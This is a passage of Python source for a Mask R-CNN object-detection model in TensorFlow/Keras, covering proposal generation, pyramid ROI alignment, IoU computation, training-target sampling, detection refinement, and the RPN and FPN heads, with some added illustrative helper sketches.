scores = utils.batch_slice([scores, ix], lambda x, y: tf.gather(x, y),
self.config.IMAGES_PER_GPU)
deltas = utils.batch_slice([deltas, ix], lambda x, y: tf.gather(x, y),
self.config.IMAGES_PER_GPU)
pre_nms_anchors = utils.batch_slice([anchors, ix], lambda a, x: tf.gather(a, x),
self.config.IMAGES_PER_GPU,
names=["pre_nms_anchors"])
# Apply deltas to anchors to get refined anchors.
# [batch, N, (y1, x1, y2, x2)]
boxes = utils.batch_slice([pre_nms_anchors, deltas],
lambda x, y: apply_box_deltas_graph(x, y),
self.config.IMAGES_PER_GPU,
names=["refined_anchors"])
# Clip to image boundaries. Since we're in normalized coordinates,
# clip to 0..1 range. [batch, N, (y1, x1, y2, x2)]
window = np.array([0, 0, 1, 1], dtype=np.float32)
boxes = utils.batch_slice(boxes,
lambda x: clip_boxes_graph(x, window),
self.config.IMAGES_PER_GPU,
names=["refined_anchors_clipped"])
# Filter out small boxes
# According to Xinlei Chen's paper, this reduces detection accuracy
# for small objects, so we're skipping it.
# Non-max suppression
def nms(boxes, scores):
indices = tf.image.non_max_suppression(
boxes, scores, self.proposal_count,
self.nms_threshold, name="rpn_non_max_suppression")
proposals = tf.gather(boxes, indices)
# Pad if needed
padding = tf.maximum(self.proposal_count - tf.shape(input=proposals)[0], 0)
proposals = tf.pad(tensor=proposals, paddings=[(0, padding), (0, 0)])
return proposals
proposals = utils.batch_slice([boxes, scores], nms,
self.config.IMAGES_PER_GPU)
if not context.executing_eagerly():
# Infer the static output shape:
out_shape = self.compute_output_shape(None)
proposals.set_shape(out_shape)
return proposals
def compute_output_shape(self, input_shape):
return None, self.proposal_count, 4
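# --- Illustrative sketch (not part of the original model.py) -----------------
# Typical usage of ProposalLayer: it consumes the RPN class probabilities, the
# RPN box deltas, and the anchors, and emits at most `proposal_count` proposals
# in normalized coordinates. The tensor names and numbers below are placeholders
# (e.g. common POST_NMS_ROIS_TRAINING and RPN_NMS_THRESHOLD defaults), not
# values defined in this file:
#
#   rpn_rois = ProposalLayer(
#       proposal_count=2000,
#       nms_threshold=0.7,
#       config=config,
#       name="ROI")([rpn_probs, rpn_bbox, anchors])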
############################################################
# ROIAlign Layer
############################################################
def log2_graph(x):
"""Implementation of Log2. TF doesn't have a native implementation."""
return tf.math.log(x) / tf.math.log(2.0)
class PyramidROIAlign(KE.Layer):
"""Implements ROI Pooling on multiple levels of the feature pyramid.
Params:
- pool_shape: [pool_height, pool_width] of the output pooled regions. Usually [7, 7]
Inputs:
- boxes: [batch, num_boxes, (y1, x1, y2, x2)] in normalized
coordinates. Possibly padded with zeros if not enough
boxes to fill the array.
- image_meta: [batch, (meta data)] Image details. See compose_image_meta()
- feature_maps: List of feature maps from different levels of the pyramid.
Each is [batch, height, width, channels]
Output:
Pooled regions in the shape: [batch, num_boxes, pool_height, pool_width, channels].
    The width and height are those specified in pool_shape in the layer
constructor.
"""
def __init__(self, pool_shape, **kwargs):
super(PyramidROIAlign, self).__init__(**kwargs)
self.pool_shape = tuple(pool_shape)
def get_config(self):
config = super(PyramidROIAlign, self).get_config()
config['pool_shape'] = self.pool_shape
return config
def call(self, inputs):
# Crop boxes [batch, num_boxes, (y1, x1, y2, x2)] in normalized coords
boxes = inputs[0]
# Image meta
# Holds details about the image. See compose_image_meta()
image_meta = inputs[1]
# Feature Maps. List of feature maps from different level of the
# feature pyramid. Each is [batch, height, width, channels]
feature_maps = inputs[2:]
# Assign each ROI to a level in the pyramid based on the ROI area.
y1, x1, y2, x2 = tf.split(boxes, 4, axis=2)
h = y2 - y1
w = x2 - x1
# Use shape of first image. Images in a batch must have the same size.
image_shape = parse_image_meta_graph(image_meta)['image_shape'][0]
# Equation 1 in the Feature Pyramid Networks paper. Account for
# the fact that our coordinates are normalized here.
# e.g. a 224x224 ROI (in pixels) maps to P4
image_area = tf.cast(image_shape[0] * image_shape[1], tf.float32)
roi_level = log2_graph(tf.sqrt(h * w) / (224.0 / tf.sqrt(image_area)))
roi_level = tf.minimum(5, tf.maximum(
2, 4 + tf.cast(tf.round(roi_level), tf.int32)))
roi_level = tf.squeeze(roi_level, 2)
# Loop through levels and apply ROI pooling to each. P2 to P5.
pooled = []
box_to_level = []
for i, level in enumerate(range(2, 6)):
ix = tf.compat.v1.where(tf.equal(roi_level, level))
level_boxes = tf.gather_nd(boxes, ix)
# Box indices for crop_and_resize.
box_indices = tf.cast(ix[:, 0], tf.int32)
# Keep track of which box is mapped to which level
box_to_level.append(ix)
            # Stop gradient propagation to ROI proposals
level_boxes = tf.stop_gradient(level_boxes)
box_indices = tf.stop_gradient(box_indices)
# Crop and Resize
# From Mask R-CNN paper: "We sample four regular locations, so
# that we can evaluate either max or average pooling. In fact,
# interpolating only a single value at each bin center (without
# pooling) is nearly as effective."
#
# Here we use the simplified approach of a single value per bin,
# which is how it's done in tf.crop_and_resize()
# Result: [batch * num_boxes, pool_height, pool_width, channels]
pooled.append(tf.image.crop_and_resize(
feature_maps[i], level_boxes, box_indices, self.pool_shape,
method="bilinear"))
# Pack pooled features into one tensor
pooled = tf.concat(pooled, axis=0)
# Pack box_to_level mapping into one array and add another
# column representing the order of pooled boxes
box_to_level = tf.concat(box_to_level, axis=0)
box_range = tf.expand_dims(tf.range(tf.shape(input=box_to_level)[0]), 1)
box_to_level = tf.concat([tf.cast(box_to_level, tf.int32), box_range],
axis=1)
# Rearrange pooled features to match the order of the original boxes
# Sort box_to_level by batch then box index
# TF doesn't have a way to sort by two columns, so merge them and sort.
sorting_tensor = box_to_level[:, 0] * 100000 + box_to_level[:, 1]
ix = tf.nn.top_k(sorting_tensor, k=tf.shape(
input=box_to_level)[0]).indices[::-1]
ix = tf.gather(box_to_level[:, 2], ix)
pooled = tf.gather(pooled, ix)
# Re-add the batch dimension
shape = tf.concat([tf.shape(input=boxes)[:2], tf.shape(input=pooled)[1:]], axis=0)
pooled = tf.reshape(pooled, shape)
return pooled
def compute_output_shape(self, input_shape):
return input_shape[0][:2] + self.pool_shape + (input_shape[2][-1], )
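# --- Illustrative sketch (not part of the original model.py) -----------------
# Worked example of the FPN level assignment used in PyramidROIAlign.call()
# (Equation 1 of the Feature Pyramid Networks paper, adapted to normalized
# coordinates). Assuming a 1024x1024 image, a 224x224-pixel ROI maps to level 4
# (P4) and a 112x112-pixel ROI maps to level 3 (P3).
def _example_roi_level(box_height_px, box_width_px, image_size=1024):
    """Hypothetical numpy mirror of the in-graph ROI-to-level computation."""
    h = box_height_px / float(image_size)    # normalized height
    w = box_width_px / float(image_size)     # normalized width
    image_area = float(image_size * image_size)
    level = 4 + np.round(np.log2(np.sqrt(h * w) / (224.0 / np.sqrt(image_area))))
    return int(np.clip(level, 2, 5))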
############################################################
# Detection Target Layer
############################################################
def overlaps_graph(boxes1, boxes2):
"""Computes IoU overlaps between two sets of boxes.
boxes1, boxes2: [N, (y1, x1, y2, x2)].
"""
# 1. Tile boxes2 and repeat boxes1. This allows us to compare
# every boxes1 against every boxes2 without loops.
# TF doesn't have an equivalent to np.repeat() so simulate it
# using tf.tile() and tf.reshape.
b1 = tf.reshape(tf.tile(tf.expand_dims(boxes1, 1),
[1, 1, tf.shape(input=boxes2)[0]]), [-1, 4])
b2 = tf.tile(boxes2, [tf.shape(input=boxes1)[0], 1])
# 2. Compute intersections
b1_y1, b1_x1, b1_y2, b1_x2 = tf.split(b1, 4, axis=1)
b2_y1, b2_x1, b2_y2, b2_x2 = tf.split(b2, 4, axis=1)
y1 = tf.maximum(b1_y1, b2_y1)
x1 = tf.maximum(b1_x1, b2_x1)
y2 = tf.minimum(b1_y2, b2_y2)
x2 = tf.minimum(b1_x2, b2_x2)
intersection = tf.maximum(x2 - x1, 0) * tf.maximum(y2 - y1, 0)
# 3. Compute unions
b1_area = (b1_y2 - b1_y1) * (b1_x2 - b1_x1)
b2_area = (b2_y2 - b2_y1) * (b2_x2 - b2_x1)
union = b1_area + b2_area - intersection
# 4. Compute IoU and reshape to [boxes1, boxes2]
iou = intersection / union
overlaps = tf.reshape(iou, [tf.shape(input=boxes1)[0], tf.shape(input=boxes2)[0]])
return overlaps
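# --- Illustrative sketch (not part of the original model.py) -----------------
# The same IoU computation as overlaps_graph(), written with numpy broadcasting
# so it is easy to check interactively: identical boxes give IoU 1.0, disjoint
# boxes give IoU 0.0.
def _example_overlaps_numpy(boxes1, boxes2):
    """Hypothetical helper; boxes1 is [N, 4] and boxes2 is [M, 4] (y1, x1, y2, x2)."""
    b1 = boxes1[:, None, :]                  # [N, 1, 4]
    b2 = boxes2[None, :, :]                  # [1, M, 4]
    y1 = np.maximum(b1[..., 0], b2[..., 0])
    x1 = np.maximum(b1[..., 1], b2[..., 1])
    y2 = np.minimum(b1[..., 2], b2[..., 2])
    x2 = np.minimum(b1[..., 3], b2[..., 3])
    intersection = np.maximum(y2 - y1, 0) * np.maximum(x2 - x1, 0)
    area1 = (b1[..., 2] - b1[..., 0]) * (b1[..., 3] - b1[..., 1])
    area2 = (b2[..., 2] - b2[..., 0]) * (b2[..., 3] - b2[..., 1])
    return intersection / (area1 + area2 - intersection)   # [N, M] IoU matrix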
def detection_targets_graph(proposals, gt_class_ids, gt_boxes, gt_masks, config):
"""Generates detection targets for one image. Subsamples proposals and
generates target class IDs, bounding box deltas, and masks for each.
Inputs:
proposals: [POST_NMS_ROIS_TRAINING, (y1, x1, y2, x2)] in normalized coordinates. Might
be zero padded if there are not enough proposals.
gt_class_ids: [MAX_GT_INSTANCES] int class IDs
gt_boxes: [MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized coordinates.
gt_masks: [height, width, MAX_GT_INSTANCES] of boolean type.
Returns: Target ROIs and corresponding class IDs, bounding box shifts,
and masks.
rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized coordinates
class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs. Zero padded.
deltas: [TRAIN_ROIS_PER_IMAGE, (dy, dx, log(dh), log(dw))]
masks: [TRAIN_ROIS_PER_IMAGE, height, width]. Masks cropped to bbox
boundaries and resized to neural network output size.
Note: Returned arrays might be zero padded if not enough target ROIs.
"""
# Assertions
asserts = [
tf.Assert(tf.greater(tf.shape(input=proposals)[0], 0), [proposals],
name="roi_assertion"),
]
with tf.control_dependencies(asserts):
proposals = tf.identity(proposals)
# Remove zero padding
proposals, _ = trim_zeros_graph(proposals, name="trim_proposals")
gt_boxes, non_zeros = trim_zeros_graph(gt_boxes, name="trim_gt_boxes")
gt_class_ids = tf.boolean_mask(tensor=gt_class_ids, mask=non_zeros,
name="trim_gt_class_ids")
gt_masks = tf.gather(gt_masks, tf.compat.v1.where(non_zeros)[:, 0], axis=2,
name="trim_gt_masks")
# Handle COCO crowds
# A crowd box in COCO is a bounding box around several instances. Exclude
# them from training. A crowd box is given a negative class ID.
crowd_ix = tf.compat.v1.where(gt_class_ids < 0)[:, 0]
non_crowd_ix = tf.compat.v1.where(gt_class_ids > 0)[:, 0]
crowd_boxes = tf.gather(gt_boxes, crowd_ix)
gt_class_ids = tf.gather(gt_class_ids, non_crowd_ix)
gt_boxes = tf.gather(gt_boxes, non_crowd_ix)
gt_masks = tf.gather(gt_masks, non_crowd_ix, axis=2)
# Compute overlaps matrix [proposals, gt_boxes]
overlaps = overlaps_graph(proposals, gt_boxes)
# Compute overlaps with crowd boxes [proposals, crowd_boxes]
crowd_overlaps = overlaps_graph(proposals, crowd_boxes)
crowd_iou_max = tf.reduce_max(input_tensor=crowd_overlaps, axis=1)
no_crowd_bool = (crowd_iou_max < 0.001)
# Determine positive and negative ROIs
roi_iou_max = tf.reduce_max(input_tensor=overlaps, axis=1)
# 1. Positive ROIs are those with >= 0.5 IoU with a GT box
positive_roi_bool = (roi_iou_max >= 0.5)
positive_indices = tf.compat.v1.where(positive_roi_bool)[:, 0]
# 2. Negative ROIs are those with < 0.5 with every GT box. Skip crowds.
negative_indices = tf.compat.v1.where(tf.logical_and(roi_iou_max < 0.5, no_crowd_bool))[:, 0]
# Subsample ROIs. Aim for 33% positive
# Positive ROIs
positive_count = int(config.TRAIN_ROIS_PER_IMAGE *
config.ROI_POSITIVE_RATIO)
positive_indices = tf.random.shuffle(positive_indices)[:positive_count]
positive_count = tf.shape(input=positive_indices)[0]
# Negative ROIs. Add enough to maintain positive:negative ratio.
r = 1.0 / config.ROI_POSITIVE_RATIO
negative_count = tf.cast(r * tf.cast(positive_count, tf.float32), tf.int32) - positive_count
negative_indices = tf.random.shuffle(negative_indices)[:negative_count]
# Gather selected ROIs
positive_rois = tf.gather(proposals, positive_indices)
negative_rois = tf.gather(proposals, negative_indices)
# Assign positive ROIs to GT boxes.
positive_overlaps = tf.gather(overlaps, positive_indices)
roi_gt_box_assignment = tf.cond(
pred=tf.greater(tf.shape(input=positive_overlaps)[1], 0),
true_fn=lambda: tf.argmax(input=positive_overlaps, axis=1),
false_fn=lambda: tf.cast(tf.constant([]), tf.int64)
)
roi_gt_boxes = tf.gather(gt_boxes, roi_gt_box_assignment)
roi_gt_class_ids = tf.gather(gt_class_ids, roi_gt_box_assignment)
# Compute bbox refinement for positive ROIs
deltas = utils.box_refinement_graph(positive_rois, roi_gt_boxes)
deltas /= config.BBOX_STD_DEV
# Assign positive ROIs to GT masks
# Permute masks to [N, height, width, 1]
transposed_masks = tf.expand_dims(tf.transpose(a=gt_masks, perm=[2, 0, 1]), -1)
# Pick the right mask for each ROI
roi_masks = tf.gather(transposed_masks, roi_gt_box_assignment)
# Compute mask targets
boxes = positive_rois
if config.USE_MINI_MASK:
# Transform ROI coordinates from normalized image space
# to normalized mini-mask space.
y1, x1, y2, x2 = tf.split(positive_rois, 4, axis=1)
gt_y1, gt_x1, gt_y2, gt_x2 = tf.split(roi_gt_boxes, 4, axis=1)
gt_h = gt_y2 - gt_y1
gt_w = gt_x2 - gt_x1
y1 = (y1 - gt_y1) / gt_h
x1 = (x1 - gt_x1) / gt_w
y2 = (y2 - gt_y1) / gt_h
x2 = (x2 - gt_x1) / gt_w
boxes = tf.concat([y1, x1, y2, x2], 1)
box_ids = tf.range(0, tf.shape(input=roi_masks)[0])
masks = tf.image.crop_and_resize(tf.cast(roi_masks, tf.float32), boxes,
box_ids,
config.MASK_SHAPE)
# Remove the extra dimension from masks.
masks = tf.squeeze(masks, axis=3)
# Threshold mask pixels at 0.5 to have GT masks be 0 or 1 to use with
# binary cross entropy loss.
masks = tf.round(masks)
# Append negative ROIs and pad bbox deltas and masks that
# are not used for negative ROIs with zeros.
rois = tf.concat([positive_rois, negative_rois], axis=0)
N = tf.shape(input=negative_rois)[0]
P = tf.maximum(config.TRAIN_ROIS_PER_IMAGE - tf.shape(input=rois)[0], 0)
rois = tf.pad(tensor=rois, paddings=[(0, P), (0, 0)])
roi_gt_boxes = tf.pad(tensor=roi_gt_boxes, paddings=[(0, N + P), (0, 0)])
roi_gt_class_ids = tf.pad(tensor=roi_gt_class_ids, paddings=[(0, N + P)])
deltas = tf.pad(tensor=deltas, paddings=[(0, N + P), (0, 0)])
masks = tf.pad(tensor=masks, paddings=[[0, N + P], (0, 0), (0, 0)])
return rois, roi_gt_class_ids, deltas, masks
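# --- Illustrative sketch (not part of the original model.py) -----------------
# Worked example of the ROI subsampling budget computed in
# detection_targets_graph(). Assuming the commonly used defaults
# TRAIN_ROIS_PER_IMAGE=200 and ROI_POSITIVE_RATIO=0.33, at most
# int(200 * 0.33) = 66 positive ROIs are kept and roughly 66 / 0.33 - 66 = 134
# negatives are added (fewer if not enough proposals are available).
def _example_roi_subsample_counts(train_rois_per_image=200, positive_ratio=0.33):
    """Hypothetical helper mirroring the positive/negative ROI budget."""
    positive_count = int(train_rois_per_image * positive_ratio)
    negative_count = int(positive_count / positive_ratio) - positive_count
    return positive_count, negative_count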
class DetectionTargetLayer(KE.Layer):
"""Subsamples proposals and generates target box refinement, class_ids,
and masks for each.
Inputs:
proposals: [batch, N, (y1, x1, y2, x2)] in normalized coordinates. Might
be zero padded if there are not enough proposals.
gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs.
gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized
coordinates.
gt_masks: [batch, height, width, MAX_GT_INSTANCES] of boolean type
Returns: Target ROIs and corresponding class IDs, bounding box shifts,
and masks.
rois: [batch, TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized
coordinates
target_class_ids: [batch, TRAIN_ROIS_PER_IMAGE]. Integer class IDs.
    target_deltas: [batch, TRAIN_ROIS_PER_IMAGE, (dy, dx, log(dh), log(dw))]
target_mask: [batch, TRAIN_ROIS_PER_IMAGE, height, width]
Masks cropped to bbox boundaries and resized to neural
network output size.
Note: Returned arrays might be zero padded if not enough target ROIs.
"""
def __init__(self, config, **kwargs):
super(DetectionTargetLayer, self).__init__(**kwargs)
self.config = config
def get_config(self):
config = super(DetectionTargetLayer, self).get_config()
config["config"] = self.config.to_dict()
return config
def call(self, inputs):
proposals = inputs[0]
gt_class_ids = inputs[1]
gt_boxes = inputs[2]
gt_masks = inputs[3]
# Slice the batch and run a graph for each slice
# TODO: Rename target_bbox to target_deltas for clarity
names = ["rois", "target_class_ids", "target_bbox", "target_mask"]
outputs = utils.batch_slice(
[proposals, gt_class_ids, gt_boxes, gt_masks],
lambda w, x, y, z: detection_targets_graph(
w, x, y, z, self.config),
self.config.IMAGES_PER_GPU, names=names)
return outputs
def compute_output_shape(self, input_shape):
return [
(None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # rois
(None, self.config.TRAIN_ROIS_PER_IMAGE), # class_ids
(None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # deltas
(None, self.config.TRAIN_ROIS_PER_IMAGE, self.config.MASK_SHAPE[0],
self.config.MASK_SHAPE[1]) # masks
]
def compute_mask(self, inputs, mask=None):
return [None, None, None, None]
############################################################
# Detection Layer
############################################################
def refine_detections_graph(rois, probs, deltas, window, config):
"""Refine classified proposals and filter overlaps and return final
detections.
Inputs:
rois: [N, (y1, x1, y2, x2)] in normalized coordinates
probs: [N, num_classes]. Class probabilities.
deltas: [N, num_classes, (dy, dx, log(dh), log(dw))]. Class-specific
bounding box deltas.
window: (y1, x1, y2, x2) in normalized coordinates. The part of the image
that contains the image excluding the padding.
Returns detections shaped: [num_detections, (y1, x1, y2, x2, class_id, score)] where
coordinates are normalized.
"""
# Class IDs per ROI
class_ids = tf.argmax(input=probs, axis=1, output_type=tf.int32)
# Class probability of the top class of each ROI
indices = tf.stack([tf.range(probs.shape[0]), class_ids], axis=1)
class_scores = tf.gather_nd(probs, indices)
# Class-specific bounding box deltas
deltas_specific = tf.gather_nd(deltas, indices)
# Apply bounding box deltas
# Shape: [boxes, (y1, x1, y2, x2)] in normalized coordinates
refined_rois = apply_box_deltas_graph(
rois, deltas_specific * config.BBOX_STD_DEV)
# Clip boxes to image window
refined_rois = clip_boxes_graph(refined_rois, window)
# TODO: Filter out boxes with zero area
# Filter out background boxes
keep = tf.compat.v1.where(class_ids > 0)[:, 0]
# Filter out low confidence boxes
if config.DETECTION_MIN_CONFIDENCE:
conf_keep = tf.compat.v1.where(class_scores >= config.DETECTION_MIN_CONFIDENCE)[:, 0]
keep = tf.sets.intersection(tf.expand_dims(keep, 0),
tf.expand_dims(conf_keep, 0))
keep = tf.sparse.to_dense(keep)[0]
# Apply per-class NMS
# 1. Prepare variables
pre_nms_class_ids = tf.gather(class_ids, keep)
pre_nms_scores = tf.gather(class_scores, keep)
pre_nms_rois = tf.gather(refined_rois, keep)
unique_pre_nms_class_ids = tf.unique(pre_nms_class_ids)[0]
def nms_keep_map(class_id):
"""Apply Non-Maximum Suppression on ROIs of the given class."""
# Indices of ROIs of the given class
ixs = tf.compat.v1.where(tf.equal(pre_nms_class_ids, class_id))[:, 0]
# Apply NMS
class_keep = tf.image.non_max_suppression(
tf.gather(pre_nms_rois, ixs),
tf.gather(pre_nms_scores, ixs),
max_output_size=config.DETECTION_MAX_INSTANCES,
iou_threshold=config.DETECTION_NMS_THRESHOLD)
# Map indices
class_keep = tf.gather(keep, tf.gather(ixs, class_keep))
# Pad with -1 so returned tensors have the same shape
gap = config.DETECTION_MAX_INSTANCES - tf.shape(input=class_keep)[0]
class_keep = tf.pad(tensor=class_keep, paddings=[(0, gap)],
mode='CONSTANT', constant_values=-1)
# Set shape so map_fn() can infer result shape
class_keep.set_shape([config.DETECTION_MAX_INSTANCES])
return class_keep
# 2. Map over class IDs
nms_keep = tf.map_fn(nms_keep_map, unique_pre_nms_class_ids,
dtype=tf.int64)
# 3. Merge results into one list, and remove -1 padding
nms_keep = tf.reshape(nms_keep, [-1])
nms_keep = tf.gather(nms_keep, tf.compat.v1.where(nms_keep > -1)[:, 0])
# 4. Compute intersection between keep and nms_keep
keep = tf.sets.intersection(tf.expand_dims(keep, 0),
tf.expand_dims(nms_keep, 0))
keep = tf.sparse.to_dense(keep)[0]
# Keep top detections
roi_count = config.DETECTION_MAX_INSTANCES
class_scores_keep = tf.gather(class_scores, keep)
num_keep = tf.minimum(tf.shape(input=class_scores_keep)[0], roi_count)
top_ids = tf.nn.top_k(class_scores_keep, k=num_keep, sorted=True)[1]
keep = tf.gather(keep, top_ids)
# Arrange output as [N, (y1, x1, y2, x2, class_id, score)]
# Coordinates are normalized.
detections = tf.concat([
tf.gather(refined_rois, keep),
tf.dtypes.cast(tf.gather(class_ids, keep), tf.float32)[..., tf.newaxis],
tf.gather(class_scores, keep)[..., tf.newaxis]
], axis=1)
# Pad with zeros if detections < DETECTION_MAX_INSTANCES
gap = config.DETECTION_MAX_INSTANCES - tf.shape(input=detections)[0]
detections = tf.pad(tensor=detections, paddings=[(0, gap), (0, 0)], mode="CONSTANT")
return detections
class DetectionLayer(KE.Layer):
"""Takes classified proposal boxes and their bounding box deltas and
returns the final detection boxes.
Returns:
[batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] where
coordinates are normalized.
"""
def __init__(self, config=None, **kwargs):
super(DetectionLayer, self).__init__(**kwargs)
self.config = config
def get_config(self):
config = super(DetectionLayer, self).get_config()
config["config"] = self.config.to_dict()
return config
def call(self, inputs):
rois = inputs[0]
mrcnn_class = inputs[1]
mrcnn_bbox = inputs[2]
image_meta = inputs[3]
# Get windows of images in normalized coordinates. Windows are the area
# in the image that excludes the padding.
# Use the shape of the first image in the batch to normalize the window
# because we know that all images get resized to the same size.
m = parse_image_meta_graph(image_meta)
image_shape = m['image_shape'][0]
window = norm_boxes_graph(m['window'], image_shape[:2])
# Run detection refinement graph on each item in the batch
detections_batch = utils.batch_slice(
[rois, mrcnn_class, mrcnn_bbox, window],
lambda x, y, w, z: refine_detections_graph(x, y, w, z, self.config),
self.config.IMAGES_PER_GPU)
# Reshape output
# [batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] in
# normalized coordinates
return tf.reshape(
detections_batch,
[self.config.BATCH_SIZE, self.config.DETECTION_MAX_INSTANCES, 6])
def compute_output_shape(self, input_shape):
return (None, self.config.DETECTION_MAX_INSTANCES, 6)
############################################################
# Region Proposal Network (RPN)
############################################################
def rpn_graph(feature_map, anchors_per_location, anchor_stride):
"""Builds the computation graph of Region Proposal Network.
feature_map: backbone features [batch, height, width, depth]
anchors_per_location: number of anchors per pixel in the feature map
anchor_stride: Controls the density of anchors. Typically 1 (anchors for
every pixel in the feature map), or 2 (every other pixel).
Returns:
rpn_class_logits: [batch, H * W * anchors_per_location, 2] Anchor classifier logits (before softmax)
rpn_probs: [batch, H * W * anchors_per_location, 2] Anchor classifier probabilities.
rpn_bbox: [batch, H * W * anchors_per_location, (dy, dx, log(dh), log(dw))] Deltas to be
applied to anchors.
"""
# TODO: check if stride of 2 causes alignment issues if the feature map
# is not even.
# Shared convolutional base of the RPN
shared = KL.Conv2D(512, (3, 3), padding='same', activation='relu',
strides=anchor_stride,
name='rpn_conv_shared')(feature_map)
# Anchor Score. [batch, height, width, anchors per location * 2].
x = KL.Conv2D(2 * anchors_per_location, (1, 1), padding='valid',
activation='linear', name='rpn_class_raw')(shared)
# Reshape to [batch, anchors, 2]
rpn_class_logits = KL.Lambda(
lambda t: tf.reshape(t, [tf.shape(input=t)[0], -1, 2]))(x)
# Softmax on last dimension of BG/FG.
rpn_probs = KL.Activation(
"softmax", name="rpn_class_xxx")(rpn_class_logits)
# Bounding box refinement. [batch, H, W, anchors per location * depth]
# where depth is [x, y, log(w), log(h)]
x = KL.Conv2D(anchors_per_location * 4, (1, 1), padding="valid",
activation='linear', name='rpn_bbox_pred')(shared)
# Reshape to [batch, anchors, 4]
rpn_bbox = KL.Lambda(lambda t: tf.reshape(t, [tf.shape(input=t)[0], -1, 4]))(x)
return [rpn_class_logits, rpn_probs, rpn_bbox]
def build_rpn_model(anchor_stride, anchors_per_location, depth):
"""Builds a Keras model of the Region Proposal Network.
It wraps the RPN graph so it can be used multiple times with shared
weights.
anchors_per_location: number of anchors per pixel in the feature map
anchor_stride: Controls the density of anchors. Typically 1 (anchors for
every pixel in the feature map), or 2 (every other pixel).
depth: Depth of the backbone feature map.
Returns a Keras Model object. The model outputs, when called, are:
rpn_class_logits: [batch, H * W * anchors_per_location, 2] Anchor classifier logits (before softmax)
rpn_probs: [batch, H * W * anchors_per_location, 2] Anchor classifier probabilities.
rpn_bbox: [batch, H * W * anchors_per_location, (dy, dx, log(dh), log(dw))] Deltas to be
applied to anchors.
"""
input_feature_map = KL.Input(shape=[None, None, depth],
name="input_rpn_feature_map")
outputs = rpn_graph(input_feature_map, anchors_per_location, anchor_stride)
return KM.Model([input_feature_map], outputs, name="rpn_model")
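# --- Illustrative sketch (not part of the original model.py) -----------------
# Minimal example of building the shared RPN and applying it to one FPN level.
# The feature depth of 256 and the 3 anchors per location are assumptions that
# match commonly used Mask R-CNN defaults, not values defined in this file.
def _example_rpn_on_feature_map():
    rpn = build_rpn_model(anchor_stride=1, anchors_per_location=3, depth=256)
    p2 = KL.Input(shape=[256, 256, 256], name="example_p2")   # e.g. the P2 level
    rpn_class_logits, rpn_probs, rpn_bbox = rpn([p2])
    return KM.Model(inputs=p2,
                    outputs=[rpn_class_logits, rpn_probs, rpn_bbox],
                    name="example_rpn")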
############################################################
# Feature Pyramid Network Heads
############################################################
def fpn_classifier_graph(rois, feature_maps, image_meta,
pool_size, num_classes, train_bn=True,
fc_layers_size=1024):
"""Builds the computation graph of the feature pyramid network classifier
and regressor heads.
rois: [batch, num_rois, (y1, x1, y2, x2)] Proposal boxes in normalized
coordinates.
feature_maps: List of feature maps from different layers of the pyramid,
[P2, P3, P4, P5]. Each has a different resolution.
image_meta: [batch, (meta data)] Image details. See compose_image_meta()
pool_size: The width of the square feature map generated from ROI Pooling.
num_classes: number of classes, which determines the depth of the results
train_bn: Boolean. Train or freeze Batch Norm layers
fc_layers_size: Size of the 2 FC layers
Returns:
logits: [batch, num_rois, NUM_CLASSES] classifier logits (before softmax)
probs: [batch, num_rois, NUM_CLASSES] classifier probabilities
bbox_deltas: [batch, num_rois, NUM_CLASSES, (dy, dx, log(dh), log(dw))] Deltas to apply to
proposal boxes
"""
# ROI Pooling
# Shape: [batch, num_rois, POOL_SIZE, POOL_SIZE, channels]
x = PyramidROIAlign([pool_size, pool_size],
name="roi_align_classifier")([rois, image_meta] + feature_maps)
# Two 1024 FC layers (implemented with Conv2D for consistency)
x = KL.TimeDistributed(KL.Conv2D(fc_layers_size, (pool_size, pool_size), padding="valid"),
name="mrcnn_class_conv1")(x)
x = KL.TimeDistributed(BatchNorm(), name='mrcnn_class_bn1')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(fc_layers_size, (1, 1)),
name="mrcnn_class_conv2")(x)
x = KL.TimeDistributed(BatchNorm(), name='mrcnn_class_bn2')(x, training=train_bn)
x = KL.Activation('relu')(x)
shared = KL.Lambda(lambda x: K.squeeze(K.squeeze(x, 3), 2),
name="pool_squeeze")(x)
# Classifier head
mrcnn_class_logits = KL.TimeDistributed(KL.Dense(num_classes),
name='mrcnn_class_logits')(shared)
mrcnn_probs = KL.TimeDistributed(KL.Activation("softmax"),
name="mrcnn_class")(mrcnn_class_logits)
# BBox head
# [batch, num_rois, NUM_CLASSES * (dy, dx, log(dh), log(dw))]
x = KL.TimeDistributed(KL.Dense(num_classes * 4, activation='linear'),
name='mrcnn_bbox_fc')(shared)
# Reshape to [batch, num_rois, NUM_CLASSES, (dy, dx, log(dh), log(dw))]
s = K.int_shape(x)
if s[1] is None:
mrcnn_bbox = KL.Reshape((-1, num_classes, 4), name="mrcnn_bbox")(x)
else:
mrcnn_bbox = KL.Reshape((s[1], num_classes, 4), name="mrcnn_bbox")(x)
return mrcnn_class_logits, mrcnn_probs, mrcnn_bbox
def build_fpn_mask_graph(rois, feature_maps, image_meta,
pool_size, num_classes, train_bn=True):
"""Builds the computation graph of the mask head of Feature Pyramid Network.
rois: [batch, num_rois, (y1, x1, y2, x2)] Proposal boxes in normalized
coordinates.
feature_maps: List of feature maps from different layers of the pyramid,
[P2, P3, P4, P5]. Each has a different resolution.
image_meta: [batch, (meta data)] Image details. See compose_image_meta()
pool_size: The width of the square feature map generated from ROI Pooling.
num_classes: number of classes, which determines the depth of the results
train_bn: Boolean. Train or freeze Batch Norm layers
Returns: Masks [batch, num_rois, MASK_POOL_SIZE, MASK_POOL_SIZE, NUM_CLASSES]
"""
# ROI Pooling
# Shape: [batch, num_rois, MASK_POOL_SIZE, MASK_POOL_SIZE, channels]
x = PyramidROIAlign([pool_size, pool_size],
name="roi_align_mask")([rois, image_meta] + feature_maps)
# Conv layers
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv1")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn1')(x, training=train_bn)
